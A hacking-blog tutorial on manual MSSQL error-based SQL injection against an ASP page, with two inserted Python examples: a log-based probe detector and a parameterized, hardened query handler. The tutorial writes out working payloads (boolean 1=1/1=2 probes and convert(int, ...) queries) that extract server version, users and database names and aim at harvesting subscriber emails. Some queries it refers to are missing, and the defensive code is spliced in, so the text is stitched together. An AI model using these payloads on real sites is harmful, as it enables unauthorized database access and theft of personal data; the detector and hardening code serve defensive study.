Manual MSSQL Injection with error | [Microsoft OLE DB Provider for ODBC Drivers error '80040e07'] | Attack with convert

Hi readers! Today I will be demonstrating how to exploit websites vulnerable to MSSQL error-based injection. Many people don't try their hand manually on ASP websites, as they just open havij.exe & do the lame thing! So I hope all those who use havij.exe learn something new in this post :). Let's get started!



Things Required
  •  Vulnerable Website


Step By Step Guide

  •  So let's assume we have found a vulnerable website, xyz.com:
   http://www.xyz.com/vuln.asp?code=11'

  • Now our first job will be the same as in the previous MSSQL injection tutorial, which is to confirm that the error is genuine, because not every error means the site is vulnerable to SQL injection.
http://www.xyz.com/vuln.asp?code=266 and 1=1#  -> This URL will load normally without any errors, as 1 is always equal to 1 (simple mathematics).

http://www.xyz.com/vuln.asp?code=266 and 1=2#  -> This URL will not load normally, as 1 is not equal to 2.

So by observing this difference in behaviour we can say that yes, the URL is a genuine injection point. Let's now proceed with our next step.

  • Now we will be extracting the basic information about the target website, like the db name, system user, host name, version, db server, current db etc.



DB Name -   http://www.xyz.com/vuln.asp?code=266 and 1=convert(int,db_name())  - Randomname



Version - http://www.xyz.com/vuln.asp?code=266 and 1=convert(int,@@version) - Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86) Feb 9 2007 22:47:07 Copyright (c) 1988-2005 Microsoft Corporation
Workgroup Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

System User - http://www.xyz.com/vuln.asp?code=266 and 1=convert(int,system_user) - Randomuser

Host Name - http://www.xyz.com/vuln.asp?code=266 and 1=convert(int,host_name())  - Randomhost

Server Name - http://www.xyz.com/vuln.asp?code=266 and 1=convert(int,@@servername)  - randomserver




  • Once we are done extracting the basic information about our target, our next step will be to find out the number of databases (database count).

 DB Count -  http://www.xyz.com/vuln.asp?code=266 and 1=convert(int,(select top 1 cast(count([name]) as nvarchar(4000)) from [master]..[sysdatabases] )%2bchar(33))    -  10

-  Here I'm using char(33), i.e. "!", which is only there for the syntax. So don't include the "!" sign with the output.
-  nvarchar is a data type that stores character data in a variable-length field. We have used nvarchar(4000) because the nvarchar(max) size is limited to 4000 characters.
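The probes described so far (the 1=1 / 1=2 pair and the convert(int, ...) requests) leave a recognisable trail in the web server log, and the whole technique only works because the conversion error is echoed back to the browser. The following is an added example, not part of the original post: a Python script that parses constructed IIS W3C-format log lines, tags each request by the injection signatures seen on this page, reports a client whose 1=1 request succeeded while its 1=2 request failed (the boolean oracle used above to confirm the injection point), and checks a response body for the '80040e07' driver error from the title. The log lines, IP addresses and field layout are constructed/assumed.

```python
"""Flag MSSQL error-based / boolean injection probes in IIS W3C log lines.

Added example, not from the original post. The log lines below are
constructed; the field order assumed is the common IIS W3C layout:
date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username
c-ip cs(User-Agent) sc-status.
"""
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample log mirroring the request shapes shown in this post.
SAMPLE_LOG = """\
2024-01-01 10:00:01 10.0.0.5 GET /vuln.asp code=266 80 - 203.0.113.7 Mozilla/5.0 200
2024-01-01 10:00:02 10.0.0.5 GET /vuln.asp code=266+and+1%3d1%23 80 - 203.0.113.7 Mozilla/5.0 200
2024-01-01 10:00:03 10.0.0.5 GET /vuln.asp code=266+and+1%3d2%23 80 - 203.0.113.7 Mozilla/5.0 500
2024-01-01 10:00:04 10.0.0.5 GET /vuln.asp code=266+and+1%3dconvert(int,@@version) 80 - 203.0.113.7 Mozilla/5.0 500
2024-01-01 10:00:05 10.0.0.5 GET /vuln.asp code=266+and+1%3dconvert(int,(select+top+1+cast(count([name])+as+nvarchar(4000))+from+[master]..[sysdatabases])%2bchar(33)) 80 - 203.0.113.7 Mozilla/5.0 500
2024-01-01 10:00:06 10.0.0.5 GET /vuln.asp code=267 80 - 198.51.100.9 Mozilla/5.0 200
2024-01-01 10:00:07 10.0.0.5 GET /about.asp - 80 - 198.51.100.9 Mozilla/5.0 200
"""

# Signatures derived from the request shapes on this page.
SIGNATURES = {
    "type_conversion_probe": re.compile(r"\bconvert\s*\(\s*int\s*,", re.I),
    "server_metadata": re.compile(r"@@(version|servername)|\b(db_name|host_name|system_user)\b", re.I),
    "catalog_enumeration": re.compile(r"\bsys(databases|objects|columns)\b", re.I),
    "char_concat": re.compile(r"\bchar\s*\(\s*\d+\s*\)", re.I),
    "boolean_tautology": re.compile(r"\band\s+1\s*=\s*[12]\b", re.I),
}
# The driver error code from the post's title, plus the conversion-failure
# wording SQL Server puts in the message it wraps.
ERROR_LEAK = re.compile(r"80040e07|data type int", re.I)
TRUE_PROBE = re.compile(r"\band\s+1\s*=\s*1\b", re.I)
FALSE_PROBE = re.compile(r"\band\s+1\s*=\s*2\b", re.I)


def parse_line(line):
    """Split one W3C line into the fields this script needs, or None."""
    fields = line.split()
    if len(fields) != 11 or fields[0].startswith("#"):
        return None
    date, time, _s_ip, method, stem, query, _port, _user, c_ip, _ua, status = fields
    return {
        "time": f"{date} {time}",
        "method": method,
        "stem": stem,
        "query": "" if query == "-" else unquote_plus(query),  # decode %3d, %2b, +
        "client": c_ip,
        "status": int(status),
    }


def classify(query):
    """Return the sorted signature names that match a decoded query string."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(query))


def response_leaks_conversion_error(body):
    """True if a response body exposes the conversion error the attack reads from."""
    return ERROR_LEAK.search(body) is not None


def analyze(log_text):
    """Tag suspicious requests and find clients that completed a 1=1 / 1=2 oracle pair."""
    findings = []
    oracle = defaultdict(dict)  # (client, path) -> {"true": status, "false": status}
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        tags = classify(rec["query"])
        if tags:
            findings.append({"time": rec["time"], "client": rec["client"],
                             "status": rec["status"], "tags": tags, "query": rec["query"]})
        key = (rec["client"], rec["stem"])
        if TRUE_PROBE.search(rec["query"]):
            oracle[key]["true"] = rec["status"]
        elif FALSE_PROBE.search(rec["query"]):
            oracle[key]["false"] = rec["status"]
    # A working oracle: the tautology returned normally, the contradiction did not.
    confirmed = sorted(k for k, seen in oracle.items()
                       if seen.get("true") == 200 and "false" in seen and seen["false"] != 200)
    return {"findings": findings, "boolean_oracle": confirmed}


if __name__ == "__main__":
    report = analyze(SAMPLE_LOG)
    for f in report["findings"]:
        print(f["time"], f["client"], f["status"], ",".join(f["tags"]), f["query"])
    for client, path in report["boolean_oracle"]:
        print(f"boolean oracle confirmed: {client} against {path}")
```

Run it against a real IIS log by replacing SAMPLE_LOG with the file contents; the signature table is the part worth tuning, since `char(` and `convert(int,` are also legitimate in some application URLs and a 500 on the contradiction request is only meaningful when paired with a 200 on the tautology from the same client.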



  • Extracting database names - In the previous step we found out that our database count is 10. So in this step we will be finding out all 10 database names.


 DB Name - http://www.xyz.com/vuln.asp?code=266 and 1=convert(int,(select cast(name as nvarchar(4000)) from master..sysdatabases where dbid=1))

When we execute the above query, we get our first database name. Note carefully the end of the query, "dbid=1". To extract the other database names we will be replacing "1" by 2,3,4,5,6,7,8,9 & so on.

Example -

 http://www.xyz.com/vuln.asp?code=266 and 1=convert(int,(select cast(name as nvarchar(4000)) from master..sysdatabases where dbid=2))

http://www.xyz.com/vuln.asp?code=266 and 1=convert(int,(select cast(name as nvarchar(4000)) from master..sysdatabases where dbid=3))




  • Table Count - Now all the database names are known to us. It's time to hunt down the tables & columns! Firstly we will be finding the number of tables (table count) in the current db.

So the number of tables in the current db is 73.


  •  Extracting Table names -
By executing the above query you will get your first table name. In my case the first table name was contnetarticles. Now to find the 2nd & other tables just keep on replacing "1" (highlighted in green in the above query) by 2,3,4,5,6,7...73 until you have extracted all the table names.
Here in my case there was no admin or any user table (UnLuCkY), so for demonstration I'll be extracting from the subscribers table!



  • Aaah! I know some people will find it difficult seeing this bunch of lines & queries. If you feel like that, then believe me, just close this website & watch Pogo. Anyway, let's get back to the tutorial. Now we are left with just two steps: finding the column names & then finally extracting the data from the columns.
 Extracting Columns -




In the above query we have converted our table name to its ASCII values. In my case it was:
subscribers - ASCII values - 115 117 98 115 99 114 105 98 101 114 115.
Now by executing the above query, we will get our first column name. To get all the column names, just keep on replacing "1" (highlighted in green in the above query) by 2,3,4,5,6,7...21 until you have extracted all the column names. The columns I got are badMails, email, title, surname & many others.




  • Finally we are on our last step, which is to extract data from the respective columns. I will be extracting the email column which I got in the previous step. So here goes our final query to extract the email.
 Extracting Data -
So I hope you all enjoyed & learned something new! If there's any mistake in this tutorial then please notify me via comment!
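Every step in this chain depends on two things: the value of the `code` parameter being pasted straight into the SQL text, and the resulting conversion error being echoed back to the client. As an added example, not from the original post, here is the vulnerable pattern next to a hardened handler in Python: strict integer validation of `code`, a parameterized query, and generic error responses. sqlite3 stands in for the ADO/ODBC connection an ASP page would use (an assumption; with pyodbc the `?` placeholder is the same), and the table `articles`, the column `title` and the sample rows are constructed.

```python
"""Vulnerable string-built query beside a hardened lookup for a numeric parameter.

Added example, not from the original post. sqlite3 stands in for the ADO/ODBC
connection an ASP page would use (assumption); the schema and rows are constructed.
"""
import re
import sqlite3


def build_query_unsafe(raw_code):
    """The pattern the tutorial exploits: the request value becomes SQL text."""
    return "SELECT title FROM articles WHERE code = " + raw_code


def validate_code(raw_code):
    """Accept only a plain decimal integer; spaces, '=', quotes and '#' are all rejected."""
    if not re.fullmatch(r"[0-9]{1,9}", raw_code or ""):
        raise ValueError("code must be an integer")
    return int(raw_code)


def lookup_safe(conn, raw_code):
    """Validate, then bind the value as a parameter so it can only ever be data."""
    code = validate_code(raw_code)
    cur = conn.execute("SELECT title FROM articles WHERE code = ?", (code,))
    return [row[0] for row in cur.fetchall()]


def handle_request(conn, raw_code):
    """Return (status, body) and never echo driver or database error text to the client."""
    try:
        rows = lookup_safe(conn, raw_code)
    except ValueError:
        return 400, "invalid request"
    except sqlite3.Error:
        return 500, "internal error"  # the real message belongs in the server log only
    return (200, rows[0]) if rows else (404, "not found")


def demo_db():
    """Constructed in-memory table standing in for the application's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (code INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO articles VALUES (?, ?)",
                     [(11, "first article"), (266, "second article")])
    return conn


if __name__ == "__main__":
    conn = demo_db()
    payload = "266 and 1=convert(int,@@version)"
    print("unsafe SQL would be:", build_query_unsafe(payload))
    for value in ("266", payload, "9999"):
        print(repr(value), "->", handle_request(conn, value))
```

The order matters: validation stops the payload before any SQL is built, the bound parameter means a value that somehow passed validation is still compared as data rather than parsed as SQL, and the generic error bodies remove the '80040e07' conversion error that the convert(int, ...) trick relies on reading back.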

Any Doubts? - Comment!

Reviewed by Rishal Dwivedi on 20:01 Rating: 5
